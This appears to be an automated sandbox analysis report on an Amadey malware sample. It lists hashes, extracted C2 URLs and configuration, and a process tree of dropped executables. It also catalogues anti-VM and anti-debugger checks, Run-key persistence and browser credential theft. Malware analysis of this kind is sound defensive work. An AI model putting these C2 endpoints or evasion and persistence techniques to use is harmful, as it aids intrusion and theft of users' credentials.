Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
27/04/2024, 17:07 UTC
Static task
static1
Behavioral task
behavioral1
Sample
acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75.exe
Resource
win10v2004-20240426-en
General
-
Target
acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75.exe
-
Size
1.8MB
-
MD5
3129fec389a088955fae72aa12b20ef0
-
SHA1
e4cc27027754574a6abdf0010333930016b37fb5
-
SHA256
acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75
-
SHA512
918ac19261d99d7ea7cc92bdf6e72a8caff90eb6241c650fe95cf0230bce9af8bc52231c0a7452244b88b6024b0061351520e57400952e4bf4191e67bc8139e9
-
SSDEEP
49152:r3/bnfCUYZWGdSbS36Q5DTFpcL4Mne/qMFZQK:rjnf2vFpcL1uFZ
Malware Config
Extracted
amadey
4.20
http://193.233.132.139
-
install_dir
5454e6f062
-
install_file
explorta.exe
-
strings_key
c7a869c5ba1d72480093ec207994e2bf
-
url_paths
/sev56rkm/index.php
Extracted
amadey
4.17
http://193.233.132.167
-
install_dir
4d0ab15804
-
install_file
chrosha.exe
-
strings_key
1a9519d7b465e1f4880fa09a6162d768
-
url_paths
/enigma/index.php
Signatures
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 7 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ chrosha.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorta.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorta.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ amert.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 13ee951efa.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ explorta.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 78 4968 rundll32.exe 79 1044 rundll32.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion amert.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion amert.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 13ee951efa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion chrosha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 13ee951efa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorta.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion chrosha.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion explorta.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75.exe Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation explorta.exe Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation ee00809619.exe Key value queried \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Control Panel\International\Geo\Nation chrosha.exe -
Executes dropped EXE 7 IoCs
pid Process 4688 explorta.exe 4812 amert.exe 2428 ee00809619.exe 2272 13ee951efa.exe 2484 explorta.exe 3068 chrosha.exe 3428 explorta.exe -
Identifies Wine through registry keys 2 TTPs 7 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine chrosha.exe Key opened \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine explorta.exe Key opened \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75.exe Key opened \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine explorta.exe Key opened \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine amert.exe Key opened \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine 13ee951efa.exe Key opened \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\Software\Wine explorta.exe -
Loads dropped DLL 3 IoCs
pid Process 1712 rundll32.exe 4968 rundll32.exe 1044 rundll32.exe -
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ee00809619.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000016001\\ee00809619.exe" explorta.exe Set value (str) \REGISTRY\USER\S-1-5-21-3906287020-2915474608-1755617787-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\13ee951efa.exe = "C:\\Users\\Admin\\1000017002\\13ee951efa.exe" explorta.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000700000002344b-57.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
pid Process 3136 acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75.exe 4688 explorta.exe 4812 amert.exe 2272 13ee951efa.exe 3068 chrosha.exe 2484 explorta.exe 3428 explorta.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\Tasks\explorta.job acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75.exe File created C:\Windows\Tasks\chrosha.job amert.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133587112625490842" chrome.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3906287020-2915474608-1755617787-1000\{E8B429F8-817C-4CC6-BB30-92DF7923D28C} chrome.exe -
Suspicious behavior: EnumeratesProcesses 33 IoCs
pid Process 3136 acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75.exe 3136 acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75.exe 4688 explorta.exe 4688 explorta.exe 4812 amert.exe 4812 amert.exe 2364 chrome.exe 2364 chrome.exe 2272 13ee951efa.exe 2272 13ee951efa.exe 3068 chrosha.exe 3068 chrosha.exe 2484 explorta.exe 2484 explorta.exe 4968 rundll32.exe 4968 rundll32.exe 4968 rundll32.exe 4968 rundll32.exe 4968 rundll32.exe 4968 rundll32.exe 4968 rundll32.exe 4968 rundll32.exe 4968 rundll32.exe 4968 rundll32.exe 3520 powershell.exe 3520 powershell.exe 3520 powershell.exe 2364 chrome.exe 2364 chrome.exe 3428 explorta.exe 3428 explorta.exe 3248 chrome.exe 3248 chrome.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
pid Process 2364 chrome.exe 2364 chrome.exe 2364 chrome.exe 2364 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 2364 chrome.exe Token: SeCreatePagefilePrivilege 2364 chrome.exe Token: SeShutdownPrivilege 2364 chrome.exe Token: SeCreatePagefilePrivilege 2364 chrome.exe Token: SeShutdownPrivilege 2364 chrome.exe Token: SeCreatePagefilePrivilege 2364 chrome.exe Token: SeShutdownPrivilege 2364 chrome.exe Token: SeCreatePagefilePrivilege 2364 chrome.exe Token: SeShutdownPrivilege 2364 chrome.exe Token: SeCreatePagefilePrivilege 2364 chrome.exe Token: SeShutdownPrivilege 2364 chrome.exe Token: SeCreatePagefilePrivilege 2364 chrome.exe Token: SeShutdownPrivilege 2364 chrome.exe Token: SeCreatePagefilePrivilege 2364 chrome.exe Token: SeShutdownPrivilege 2364 chrome.exe Token: SeCreatePagefilePrivilege 2364 chrome.exe Token: SeShutdownPrivilege 2364 chrome.exe Token: SeCreatePagefilePrivilege 2364 chrome.exe Token: SeShutdownPrivilege 2364 chrome.exe Token: SeCreatePagefilePrivilege 2364 chrome.exe Token: SeShutdownPrivilege 2364 chrome.exe Token: SeCreatePagefilePrivilege 2364 chrome.exe Token: SeShutdownPrivilege 2364 chrome.exe Token: SeCreatePagefilePrivilege 2364 chrome.exe Token: SeShutdownPrivilege 2364 chrome.exe Token: SeCreatePagefilePrivilege 2364 chrome.exe Token: SeShutdownPrivilege 2364 chrome.exe Token: SeCreatePagefilePrivilege 2364 chrome.exe Token: SeShutdownPrivilege 2364 chrome.exe Token: SeCreatePagefilePrivilege 2364 chrome.exe Token: SeShutdownPrivilege 2364 chrome.exe Token: SeCreatePagefilePrivilege 2364 chrome.exe Token: SeShutdownPrivilege 2364 chrome.exe Token: SeCreatePagefilePrivilege 2364 chrome.exe Token: SeShutdownPrivilege 2364 chrome.exe Token: SeCreatePagefilePrivilege 2364 chrome.exe Token: SeShutdownPrivilege 2364 chrome.exe Token: SeCreatePagefilePrivilege 2364 chrome.exe Token: SeShutdownPrivilege 2364 chrome.exe Token: SeCreatePagefilePrivilege 2364 chrome.exe Token: SeShutdownPrivilege 2364 chrome.exe Token: SeCreatePagefilePrivilege 2364 chrome.exe Token: SeShutdownPrivilege 2364 chrome.exe Token: SeCreatePagefilePrivilege 2364 chrome.exe Token: SeShutdownPrivilege 2364 chrome.exe Token: SeCreatePagefilePrivilege 2364 chrome.exe Token: SeShutdownPrivilege 2364 chrome.exe Token: SeCreatePagefilePrivilege 2364 chrome.exe Token: SeShutdownPrivilege 2364 chrome.exe Token: SeCreatePagefilePrivilege 2364 chrome.exe Token: SeShutdownPrivilege 2364 chrome.exe Token: SeCreatePagefilePrivilege 2364 chrome.exe Token: SeShutdownPrivilege 2364 chrome.exe Token: SeCreatePagefilePrivilege 2364 chrome.exe Token: SeShutdownPrivilege 2364 chrome.exe Token: SeCreatePagefilePrivilege 2364 chrome.exe Token: SeShutdownPrivilege 2364 chrome.exe Token: SeCreatePagefilePrivilege 2364 chrome.exe Token: SeShutdownPrivilege 2364 chrome.exe Token: SeCreatePagefilePrivilege 2364 chrome.exe Token: SeShutdownPrivilege 2364 chrome.exe Token: SeCreatePagefilePrivilege 2364 chrome.exe Token: SeShutdownPrivilege 2364 chrome.exe Token: SeCreatePagefilePrivilege 2364 chrome.exe -
Suspicious use of FindShellTrayWindow 63 IoCs
pid Process 2428 ee00809619.exe 2428 ee00809619.exe 2364 chrome.exe 2364 chrome.exe 2364 chrome.exe 2364 chrome.exe 2364 chrome.exe 2364 chrome.exe 2364 chrome.exe 2364 chrome.exe 2364 chrome.exe 2364 chrome.exe 2364 chrome.exe 2364 chrome.exe 2364 chrome.exe 2364 chrome.exe 2364 chrome.exe 2364 chrome.exe 2364 chrome.exe 2364 chrome.exe 2364 chrome.exe 2364 chrome.exe 2364 chrome.exe 2364 chrome.exe 2364 chrome.exe 2364 chrome.exe 2364 chrome.exe 2428 ee00809619.exe 2364 chrome.exe 2428 ee00809619.exe 2428 ee00809619.exe 2364 chrome.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe -
Suspicious use of SendNotifyMessage 60 IoCs
pid Process 2428 ee00809619.exe 2428 ee00809619.exe 2364 chrome.exe 2364 chrome.exe 2364 chrome.exe 2364 chrome.exe 2364 chrome.exe 2364 chrome.exe 2364 chrome.exe 2364 chrome.exe 2364 chrome.exe 2364 chrome.exe 2364 chrome.exe 2364 chrome.exe 2364 chrome.exe 2364 chrome.exe 2364 chrome.exe 2364 chrome.exe 2364 chrome.exe 2364 chrome.exe 2364 chrome.exe 2364 chrome.exe 2364 chrome.exe 2364 chrome.exe 2364 chrome.exe 2364 chrome.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe 2428 ee00809619.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3136 wrote to memory of 4688 3136 acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75.exe 86 PID 3136 wrote to memory of 4688 3136 acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75.exe 86 PID 3136 wrote to memory of 4688 3136 acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75.exe 86 PID 4688 wrote to memory of 2332 4688 explorta.exe 87 PID 4688 wrote to memory of 2332 4688 explorta.exe 87 PID 4688 wrote to memory of 2332 4688 explorta.exe 87 PID 4688 wrote to memory of 4812 4688 explorta.exe 88 PID 4688 wrote to memory of 4812 4688 explorta.exe 88 PID 4688 wrote to memory of 4812 4688 explorta.exe 88 PID 4688 wrote to memory of 2428 4688 explorta.exe 89 PID 4688 wrote to memory of 2428 4688 explorta.exe 89 PID 4688 wrote to memory of 2428 4688 explorta.exe 89 PID 2428 wrote to memory of 2364 2428 ee00809619.exe 90 PID 2428 wrote to memory of 2364 2428 ee00809619.exe 90 PID 2364 wrote to memory of 2500 2364 chrome.exe 92 PID 2364 wrote to memory of 2500 2364 chrome.exe 92 PID 2364 wrote to memory of 2740 2364 chrome.exe 93 PID 2364 wrote to memory of 2740 2364 chrome.exe 93 PID 2364 wrote to memory of 2740 2364 chrome.exe 93 PID 2364 wrote to memory of 2740 2364 chrome.exe 93 PID 2364 wrote to memory of 2740 2364 chrome.exe 93 PID 2364 wrote to memory of 2740 2364 chrome.exe 93 PID 2364 wrote to memory of 2740 2364 chrome.exe 93 PID 2364 wrote to memory of 2740 2364 chrome.exe 93 PID 2364 wrote to memory of 2740 2364 chrome.exe 93 PID 2364 wrote to memory of 2740 2364 chrome.exe 93 PID 2364 wrote to memory of 2740 2364 chrome.exe 93 PID 2364 wrote to memory of 2740 2364 chrome.exe 93 PID 2364 wrote to memory of 2740 2364 chrome.exe 93 PID 2364 wrote to memory of 2740 2364 chrome.exe 93 PID 2364 wrote to memory of 2740 2364 chrome.exe 93 PID 2364 wrote to memory of 2740 2364 chrome.exe 93 PID 2364 wrote to memory of 2740 2364 chrome.exe 93 PID 2364 wrote to memory of 2740 2364 chrome.exe 93 PID 2364 wrote to memory of 2740 2364 chrome.exe 93 PID 2364 wrote to memory of 2740 2364 chrome.exe 93 PID 2364 wrote to memory of 2740 2364 chrome.exe 93 PID 2364 wrote to memory of 2740 2364 chrome.exe 93 PID 2364 wrote to memory of 2740 2364 chrome.exe 93 PID 2364 wrote to memory of 2740 2364 chrome.exe 93 PID 2364 wrote to memory of 2740 2364 chrome.exe 93 PID 2364 wrote to memory of 2740 2364 chrome.exe 93 PID 2364 wrote to memory of 2740 2364 chrome.exe 93 PID 2364 wrote to memory of 2740 2364 chrome.exe 93 PID 2364 wrote to memory of 2740 2364 chrome.exe 93 PID 2364 wrote to memory of 2740 2364 chrome.exe 93 PID 2364 wrote to memory of 2740 2364 chrome.exe 93 PID 2364 wrote to memory of 952 2364 chrome.exe 94 PID 2364 wrote to memory of 952 2364 chrome.exe 94 PID 2364 wrote to memory of 3500 2364 chrome.exe 95 PID 2364 wrote to memory of 3500 2364 chrome.exe 95 PID 2364 wrote to memory of 3500 2364 chrome.exe 95 PID 2364 wrote to memory of 3500 2364 chrome.exe 95 PID 2364 wrote to memory of 3500 2364 chrome.exe 95 PID 2364 wrote to memory of 3500 2364 chrome.exe 95 PID 2364 wrote to memory of 3500 2364 chrome.exe 95 PID 2364 wrote to memory of 3500 2364 chrome.exe 95 PID 2364 wrote to memory of 3500 2364 chrome.exe 95 PID 2364 wrote to memory of 3500 2364 chrome.exe 95 PID 2364 wrote to memory of 3500 2364 chrome.exe 95 PID 2364 wrote to memory of 3500 2364 chrome.exe 95 PID 2364 wrote to memory of 3500 2364 chrome.exe 95 PID 2364 wrote to memory of 3500 2364 chrome.exe 95 PID 2364 wrote to memory of 3500 2364 chrome.exe 95
Processes
-
C:\Users\Admin\AppData\Local\Temp\acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75.exe"C:\Users\Admin\AppData\Local\Temp\acb73bec8148cdb9c941c0cb543f86fb8b6ead991f316016a98a65df91628a75.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3136 -
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4688 -
C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"3⤵PID:2332
-
-
C:\Users\Admin\AppData\Local\Temp\1000015001\amert.exe"C:\Users\Admin\AppData\Local\Temp\1000015001\amert.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:4812
-
-
C:\Users\Admin\AppData\Local\Temp\1000016001\ee00809619.exe"C:\Users\Admin\AppData\Local\Temp\1000016001\ee00809619.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2428 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account4⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2364 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffaef08ab58,0x7ffaef08ab68,0x7ffaef08ab785⤵PID:2500
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1692 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:25⤵PID:2740
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:85⤵PID:952
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2240 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:85⤵PID:3500
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3060 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:15⤵PID:4916
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3084 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:15⤵PID:1680
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3600 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:15⤵PID:4924
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3264 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:15⤵PID:4664
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3328 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:85⤵PID:2708
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4556 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:85⤵
- Modifies registry class
PID:1584
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4980 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:85⤵PID:4244
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5088 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:85⤵PID:1840
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5248 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:85⤵PID:3276
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5068 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:85⤵PID:2176
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5084 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:85⤵PID:528
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5404 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:85⤵PID:3048
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1912 --field-trial-handle=2032,i,8040819032497263040,2787420002077442429,131072 /prefetch:25⤵
- Suspicious behavior: EnumeratesProcesses
PID:3248
-
-
-
-
C:\Users\Admin\1000017002\13ee951efa.exe"C:\Users\Admin\1000017002\13ee951efa.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2272
-
-
-
